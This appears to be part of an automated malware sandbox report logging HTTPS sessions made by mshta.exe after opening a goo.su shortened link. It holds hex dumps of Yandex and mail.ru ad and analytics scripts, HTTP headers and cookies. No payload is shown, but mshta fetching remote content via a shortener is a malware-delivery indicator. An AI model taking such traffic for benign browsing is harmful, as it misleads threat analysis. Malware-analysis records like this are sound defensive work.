                                                                                                                                                                                                Set-Cookie: i=LiicZ4IopEaN9eOQnhAERM4Bl5KM3iZY6+m5YlzWdn5cWfjJ+l7FTvnk/bIX0NAT0EIkFFpgf6TIlWblcZs+KXNEoaY=; Expires=Thu, 17-Dec-2026 07:43:25 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                                                                                                                                Set-Cookie: yandexuid=1600551521734421405; Expires=Thu, 17-Dec-2026 07:43:25 GMT; Domain=.yandex.ru; Path=/; Secure
                                                                                                                                                                                                Set-Cookie: yashr=6385903891734421405; Path=/; Domain=.yandex.ru; Expires=Wed, 17 Dec 2025 07:43:25 GMT; Secure; HttpOnly
                                                                                                                                                                                                Set-Cookie: bh=YJ3XhLsGajSdgNe6D6DWm/UI1e/L4Aao7Py8Br2Yw+ICv7HCiw/G7uKNDcXWm7oLuKPH7QvG7uKNDfVJ; Path=/; Domain=.yandex.ru; Expires=Wed, 21 Jan 2026 07:43:25 GMT
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                X-Robots-Tag: noindex, noarchive, nofollow
                                                                                                                                                                                                X-Yandex-Req-Id: 1734421405007839-1672090668628941106702982-production-app-host-sas-pcode-407
                                                                                                                                                                                                2024-12-17 07:43:25 UTC6097INData Raw: 31 37 43 39 0d 0a 2f 2a 21 20 76 3a 31 31 37 36 34 33 31 20 62 3a 64 65 66 61 75 6c 74 20 63 3a 6c 6f 61 64 65 72 73 2f 63 6f 6e 74 65 78 74 20 2a 2f 0a 74 72 79 7b 76 61 72 20 63 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 74 6f 53 74 72 69 6e 67 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 74 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 2f 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 2f 2e 74 65 73 74 28 74 29 7c 7c 2f 5c 2f 5c 2a 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 5c 2a 5c 2f 2f 2e 74 65 73 74 28 74 29 7d 3b 63 6e 63 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 29 3f 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70
                                                                                                                                                                                                Data Ascii: 17C9/*! v:1176431 b:default c:loaders/context */try{var cnc=function(e){if(!e||!e.toString)return!1;const t=e.toString();return/\[native code\]/.test(t)||/\/\* source code not available \*\//.test(t)};cnc(Function.prototype.bind)?Function.prototype.__p
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1631INData Raw: 36 35 38 0d 0a 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 63 6c 61 6d 70 3d 76 6f 69 64 20 30 2c 74 2e 63 6c 61 6d 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 3e 6e 3f 6e 3a 65 3c 74 3f 74 3a 65 7d 7d 2c 32 37 36 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 6d 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 44 61 74 65 26 26 28 30 2c 6e 28 34 31 31 34 34 29 2e 6d 29 28 44 61 74 65 2e 6e 6f 77 29 3b 74 2e 6d 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 61 74 65 2e 6e 6f 77 28 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 7d 2c 39 38 34 38 31 3a 66 75 6e 63 74 69
                                                                                                                                                                                                Data Ascii: 658ule",{value:!0}),t.clamp=void 0,t.clamp=function(e,t,n){return e>n?n:e<t?t:e}},27611:function(e,t,n){"use strict";t.m=void 0;var r=Date&&(0,n(41144).m)(Date.now);t.m=r?function(){return Date.now()}:function(){return(new Date).getTime()}},98481:functi
                                                                                                                                                                                                2024-12-17 07:43:25 UTC6552INData Raw: 31 39 39 30 0d 0a 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 70 61 72 73 65 46 6c 6f 61 74 4e 75 6d 62 65 72 3d 76 6f 69 64 20 30 2c 74 2e 70 61 72 73 65 46 6c 6f 61 74 4e 75 6d 62 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 31 29 3b 76 61 72 20 72 3d 28 30 2c 6e 28 39 34 30 36 36 29 2e 48 29 28 65 29 3f 4e 75 6d 62 65 72 2e 70 61 72 73 65 46 6c 6f 61 74 28 65 29 3a 65 3b 72 65 74 75 72 6e 20 74 26 26 28 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 69 73 4e 61 4e 28 72 29 29 3f 4e 61 4e 3a 72 7c 7c 30 7d 7d 2c 35 36 34 33 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 6e 6f 3d 74 2e 4a 54 3d 74 2e 76 41 3d 76 6f 69 64 20 30 3b 76 61
                                                                                                                                                                                                Data Ascii: 1990sModule",{value:!0}),t.parseFloatNumber=void 0,t.parseFloatNumber=function(e,t){void 0===t&&(t=!1);var r=(0,n(94066).H)(e)?Number.parseFloat(e):e;return t&&(void 0===r||isNaN(r))?NaN:r||0}},56431:function(e,t,n){"use strict";t.no=t.JT=t.vA=void 0;va
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1623INData Raw: 36 35 30 0d 0a 72 69 63 74 22 3b 74 2e 6c 6f 61 64 42 61 6e 6e 65 72 3d 74 2e 69 6e 69 74 44 65 70 73 3d 76 6f 69 64 20 30 2c 74 2e 69 6e 69 74 44 65 70 73 3d 6e 28 34 31 38 38 33 29 2e 69 6e 69 74 44 65 70 73 2c 74 2e 6c 6f 61 64 42 61 6e 6e 65 72 3d 6e 28 34 31 38 38 33 29 2e 6c 6f 61 64 42 61 6e 6e 65 72 7d 2c 34 31 38 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 6e 28 32 38 34 33 36 29 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 62 61 6e 6e 65 72 4c 6f 61 64 65 72 3b 74 28 72 28 65 29 29 7d 29 2c 72 29 7d 29 29 7d 74 2e 69 6e 69 74 44 65
                                                                                                                                                                                                Data Ascii: 650rict";t.loadBanner=t.initDeps=void 0,t.initDeps=n(41883).initDeps,t.loadBanner=n(41883).loadBanner},41883:function(e,t,n){"use strict";function r(e){return new Promise((function(t,r){n(28436)((function(n){var r=n.bannerLoader;t(r(e))}),r)}))}t.initDe
                                                                                                                                                                                                2024-12-17 07:43:25 UTC6560INData Raw: 31 39 39 38 0d 0a 73 61 62 6c 65 46 75 6c 6c 73 63 72 65 65 6e 3d 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 43 6f 73 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 63 6f 73 74 3d 6e 65 77 28 6e 28 38 38 30 30 29 2e 43 6f 73 74 29 28 73 28 73 28 7b 7d 2c 65 29 2c 7b 63 70 6d 41 64 6a 75 73 74 6d 65 6e 74 3a 74 68 69 73 2e 63 70 6d 41 64 6a 75 73 74 6d 65 6e 74 7d 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 43 70 6d 41 64 6a 75 73 74 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 74 68 69 73 2e 63 70 6d 41 64 6a 75 73 74 6d 65 6e 74 3d 65 7d 2c 74 7d 28 63 29 3b 74 2e 54 24 3d 75 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74
                                                                                                                                                                                                Data Ascii: 1998sableFullscreen=e},t.prototype.setCost=function(e){this.cost=new(n(8800).Cost)(s(s({},e),{cpmAdjustment:this.cpmAdjustment}))},t.prototype.setCpmAdjustment=function(e){void 0===e&&(e=1),this.cpmAdjustment=e},t}(c);t.T$=u;var d=function(e){function t
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1615INData Raw: 36 34 38 0d 0a 73 3a 64 65 6c 65 74 65 20 75 2e 70 61 72 61 6d 73 2e 63 6f 64 65 54 79 70 65 2c 72 2e 70 75 73 68 28 7b 63 6f 64 65 3a 6f 2c 70 61 72 61 6d 73 3a 75 2e 70 61 72 61 6d 73 2c 73 69 7a 65 73 3a 61 2c 63 75 73 74 6f 6d 44 6f 6d 61 69 6e 3a 75 2e 63 75 73 74 6f 6d 44 6f 6d 61 69 6e 7d 29 7d 7d 29 29 2c 72 7d 2c 74 2e 61 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3d 28 74 3d 5b 5d 29 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 74 2c 28 30 2c 6e 28 36 37 33 30 36 29 2e 6d 61 70 29 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 6e 28 36 37 33 30 36 29 2e 6d 61 70 29 28 65 2e 62 69 64 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 62 69 64 64 65 72 7d 29 29 7d 29 29 29 3b 72 65
                                                                                                                                                                                                Data Ascii: 648s:delete u.params.codeType,r.push({code:o,params:u.params,sizes:a,customDomain:u.customDomain})}})),r},t.aK=function(e){var t,r=(t=[]).concat.apply(t,(0,n(67306).map)(e,(function(e){return(0,n(67306).map)(e.bids,(function(e){return e.bidder}))})));re
                                                                                                                                                                                                2024-12-17 07:43:25 UTC6568INData Raw: 31 39 41 30 0d 0a 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 6f 3d 30 2c 69 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 29 3b 6f 3c 69 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 69 5b 6f 5d 2c 73 3d 61 5b 30 5d 2c 63 3d 61 5b 31 5d 2c 75 3d 28 30 2c 6e 28 34 39 32 33 30 29 2e 43 29 28 73 29 2c 64 3d 28 30 2c 6e 28 37 37 35 35 37 29 2e 69 73 53 74 72 69 6e 67 29 28 63 29 3f 70 61 72 73 65 46 6c 6f 61 74 28 63 29 3a 63 3b 28 30 2c 6e 28 34 39 31 32 37 29 2e 7a 29 28 64 29 26 26 28 30 2c 6e 28 35 37 37 30 30 29 2e 69 73 49 6e 52 61 6e 67 65 29 28 64 2c 30 2c 35 29 3f 74 5b 75 5d 3d 63 3a 28 74 5b 75 5d 3d 31 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 48 65 61 64 65 72 42 69 64 64 69 6e 67 3a 20 22 2e 63 6f 6e 63 61 74 28 72 2e
                                                                                                                                                                                                Data Ascii: 19A0e){for(var t={},o=0,i=Object.entries(e);o<i.length;o++){var a=i[o],s=a[0],c=a[1],u=(0,n(49230).C)(s),d=(0,n(77557).isString)(c)?parseFloat(c):c;(0,n(49127).z)(d)&&(0,n(57700).isInRange)(d,0,5)?t[u]=c:(t[u]=1,console.error("HeaderBidding: ".concat(r.
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1607INData Raw: 36 34 30 0d 0a 32 30 38 29 2e 4c 29 28 29 26 26 28 30 2c 6e 28 37 37 35 39 34 29 2e 75 73 65 45 78 70 65 72 69 6d 65 6e 74 46 6c 61 67 29 28 22 4c 41 5a 59 5f 4c 4f 41 44 5f 41 44 46 4f 58 22 29 3b 21 31 21 3d 3d 74 2e 6c 61 7a 79 4c 6f 61 64 26 26 73 26 26 28 74 3d 72 28 72 28 7b 7d 2c 74 29 2c 7b 6c 61 7a 79 4c 6f 61 64 3a 72 28 72 28 7b 7d 2c 73 29 2c 74 2e 6c 61 7a 79 4c 6f 61 64 29 7d 29 29 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 74 2e 69 73 54 75 72 62 6f 3d 28 30 2c 6e 28 32 38 37 31 37 29 2e 71 31 29 28 65 2c 74 2e 69 73 54 75 72 62 6f 29 3b 76 61 72 20 6f 3d 6e 65 77 28 6e 28 36 39 39 35 34 29 2e 65 29 28 65 2c 74 2c 72 29 3b 72 65 74 75 72 6e 20 6e 28 37 32 39 34 38 29 2e 63 78 2e 70 75 73 68 28 6f 29 2c 6f 7d 28 6f
                                                                                                                                                                                                Data Ascii: 640208).L)()&&(0,n(77594).useExperimentFlag)("LAZY_LOAD_ADFOX");!1!==t.lazyLoad&&s&&(t=r(r({},t),{lazyLoad:r(r({},s),t.lazyLoad)}));var c=function(e,t,r){t.isTurbo=(0,n(28717).q1)(e,t.isTurbo);var o=new(n(69954).e)(e,t,r);return n(72948).cx.push(o),o}(o
                                                                                                                                                                                                2024-12-17 07:43:25 UTC6576INData Raw: 31 39 41 38 0d 0a 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 28 6e 28 31 38 33 30 34 29 2e 72 50 2e 50 52 45 4c 4f 41 44 2c 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 7d 29 29 7d 2c 74 2e 6f 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 61 28 6e 28 31 38 33 30 34 29 2e 72 50 2e 43 52 45 41 54 45 5f 41 44 41 50 54 49 56 45 2c 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 28 65 2c 74 2c 72 29 7d 29 29 7d 2c 74 2e 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 28 30 2c 6e 28 37 37 35 39 34 29 2e 75 73 65 45 78 70 65 72 69 6d 65 6e 74 46 6c 61 67 29 28 22 4c 41 5a 59 5f 4c 4f 41 44 5f 44 45 46 41 55 4c 54 5f 56 41 4c 55 45 53 22 29 3b 72 65 74 75 72 6e 20 65
                                                                                                                                                                                                Data Ascii: 19A8on(e){return a(n(18304).rP.PRELOAD,e,(function(e){e.initialize()}))},t.oo=function(e,t,r){return a(n(18304).rP.CREATE_ADAPTIVE,e,(function(e){s(e,t,r)}))},t.ss=function(e,t,o){var i=(0,n(77594).useExperimentFlag)("LAZY_LOAD_DEFAULT_VALUES");return e
                                                                                                                                                                                                2024-12-17 07:43:25 UTC1599INData Raw: 36 33 38 0d 0a 75 6c 65 3a 6f 2e 77 72 69 74 61 62 6c 65 7c 7c 6f 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 7c 7c 28 6f 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 5b 6e 5d 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 6f 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 29 2c 65 5b 72 5d 3d 74 5b 6e 5d 7d 2c 69 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 74 7d 29 7d 3a 66 75
                                                                                                                                                                                                Data Ascii: 638ule:o.writable||o.configurable)||(o={enumerable:!0,get:function(){return t[n]}}),Object.defineProperty(e,r,o)}:function(e,t,n,r){void 0===r&&(r=n),e[r]=t[n]},i=Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:fu


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.74971788.212.201.2044437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:25 UTC439OUTGET /hit?t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: counter.yadro.ru
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:25 UTC589INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:25 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Location: https://counter.yadro.ru/hit?q;t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946
                                                                                                                                                                                                Expires: Sun, 17 Dec 2023 21:00:00 GMT
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-control: no-cache
                                                                                                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                                                                                                Set-Cookie: FTID=1dOIkT0WQxex1dOIkT002Rcx; path=/; expires=Tue, 16 Dec 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                                                                                                Strict-Transport-Security: max-age=86400
                                                                                                                                                                                                2024-12-17 07:43:25 UTC32INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <html><body>Moved</body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.74971695.163.52.674437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:25 UTC363OUTGET /js/code.js HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: top-fwz1.mail.ru
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:26 UTC1078INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:25 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 47083
                                                                                                                                                                                                Last-Modified: Fri, 27 Sep 2024 10:37:39 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: FTID=08Bdkz1yqaYT:1734421405:0:::; path=/; expires=Thu, 18-Dec-25 07:43:25 GMT; domain=.mail.ru; HttpOnly
                                                                                                                                                                                                ETag: "66f68af3-b7eb"
                                                                                                                                                                                                Expires: Tue, 17 Dec 2024 08:43:25 GMT
                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, HEAD, PUT, OPTIONS
                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                AMP-Access-Control-Allow-Source-Origin: *
                                                                                                                                                                                                Access-Control-Expose-Headers: AMP-Access-Control-Allow-Source-Origin
                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                Accept-CH: DPR, Width, Viewport-Width, Downlink, Device-Memory, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA, Sec-CH-UA-Full-Version
                                                                                                                                                                                                Accept-CH-Lifetime: 86400
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-12-17 07:43:26 UTC15306INData Raw: 76 61 72 20 5f 74 6d 72 3d 5f 74 6d 72 7c 7c 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4a 62 28 61 29 7b 21 76 61 26 26 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 76 61 3d 61 29 3b 72 65 74 75 72 6e 20 4e 26 26 4b 62 26 26 67 62 3f 28 68 62 3d 5b 4b 62 2d 4e 2c 67 62 2d 4e 2c 53 61 3f 53 61 2d 4e 3a 6e 75 6c 6c 2c 54 61 3f 54 61 2d 4e 3a 6e 75 6c 6c 2c 76 61 3f 76 61 2d 4e 3a 6e 75 6c 6c 5d 2e 6a 6f 69 6e 28 22 2f 22 29 2c 53 61 26 26 28 54 61 26 26 76 61 29 26 26 28 4a 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 62 7d 29 2c 68 62 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 72 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 61 2e 61 64 64 45 76
                                                                                                                                                                                                Data Ascii: var _tmr=_tmr||[];(function(){function Jb(a){!va&&"number"===typeof a&&(va=a);return N&&Kb&&gb?(hb=[Kb-N,gb-N,Sa?Sa-N:null,Ta?Ta-N:null,va?va-N:null].join("/"),Sa&&(Ta&&va)&&(Jb=function(){return hb}),hb):null}function r(a,b,c){a.addEventListener?a.addEv
                                                                                                                                                                                                2024-12-17 07:43:26 UTC16384INData Raw: 31 31 35 2c 33 32 2c 31 31 36 2c 31 30 31 2c 31 32 30 2c 31 31 36 2c 36 35 2c 31 30 30 2c 33 32 2c 31 31 36 2c 31 30 31 2c 31 32 30 2c 31 31 36 2c 39 37 2c 31 30 30 2c 33 32 2c 31 31 36 2c 31 30 31 2c 31 32 30 2c 31 31 36 2c 36 35 2c 31 30 30 2c 31 31 35 2c 33 32 2c 31 31 36 2c 31 30 31 2c 31 32 30 2c 31 31 36 2c 39 37 2c 31 30 30 2c 31 31 35 2c 33 32 2c 31 31 36 2c 31 30 33 2c 0a 39 38 2c 34 35 2c 39 38 2c 39 37 2c 31 31 30 2c 31 31 30 2c 31 30 31 2c 31 31 34 2c 33 32 2c 31 31 36 2c 31 31 34 2c 31 30 33 2c 34 35 2c 39 38 2c 34 35 2c 39 38 2c 39 37 2c 31 31 30 2c 31 31 30 2c 31 30 31 2c 31 31 34 2c 34 35 2c 39 38 2c 31 30 38 2c 31 31 31 2c 39 39 2c 31 30 37 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 67 3d 61 28 67 2c 63 29 3b 68 2e 73 65 74 41 74 74 72 69 62
                                                                                                                                                                                                Data Ascii: 115,32,116,101,120,116,65,100,32,116,101,120,116,97,100,32,116,101,120,116,65,100,115,32,116,101,120,116,97,100,115,32,116,103,98,45,98,97,110,110,101,114,32,116,114,103,45,98,45,98,97,110,110,101,114,45,98,108,111,99,107).split(" "),g=a(g,c);h.setAttrib
                                                                                                                                                                                                2024-12-17 07:43:26 UTC15393INData Raw: 28 2d 31 21 3d 3d 28 62 3d 77 61 2e 69 6e 64 65 78 4f 66 28 61 29 29 29 69 66 28 77 61 2e 73 70 6c 69 63 65 28 62 2c 31 29 2c 62 3d 49 5b 61 5d 2e 69 64 29 7b 76 61 72 20 63 3d 6b 61 5b 62 5d 3b 69 66 28 63 29 7b 76 61 72 20 64 3d 63 2e 69 73 41 63 74 69 76 65 3b 64 26 26 7a 28 63 2c 42 28 29 29 3b 64 3d 79 28 62 2c 61 29 3b 64 7c 7c 28 63 2e 69 73 41 63 74 69 76 65 3d 21 31 29 7d 7d 64 65 6c 65 74 65 20 49 5b 61 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 61 2c 62 29 7b 76 61 72 20 63 3d 6b 61 5b 61 5d 3b 69 66 28 63 29 7b 76 61 72 20 64 3d 47 26 26 64 61 28 61 2c 47 29 2c 65 3d 79 28 61 29 3b 63 2e 69 73 41 63 74 69 76 65 3d 64 26 26 65 3b 63 2e 75 70 64 61 74 65 54 53 3d 62 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 29 7b 69 66 28 61 29 7b 76 61 72
                                                                                                                                                                                                Data Ascii: (-1!==(b=wa.indexOf(a)))if(wa.splice(b,1),b=I[a].id){var c=ka[b];if(c){var d=c.isActive;d&&z(c,B());d=y(b,a);d||(c.isActive=!1)}}delete I[a]}}function v(a,b){var c=ka[a];if(c){var d=G&&da(a,G),e=y(a);c.isActive=d&&e;c.updateTS=b}}function x(a,b){if(a){var


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.74972488.212.201.2044437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:27 UTC480OUTGET /hit?q;t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: counter.yadro.ru
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: FTID=1dOIkT0WQxex1dOIkT002Rcx
                                                                                                                                                                                                2024-12-17 07:43:27 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:27 GMT
                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                Content-Length: 132
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Expires: Sun, 17 Dec 2023 21:00:00 GMT
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-control: no-cache
                                                                                                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                                                                                                Set-Cookie: VID=0Nq1w70NKlOx1dOIkV0024u1; path=/; expires=Tue, 16 Dec 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Strict-Transport-Security: max-age=86400
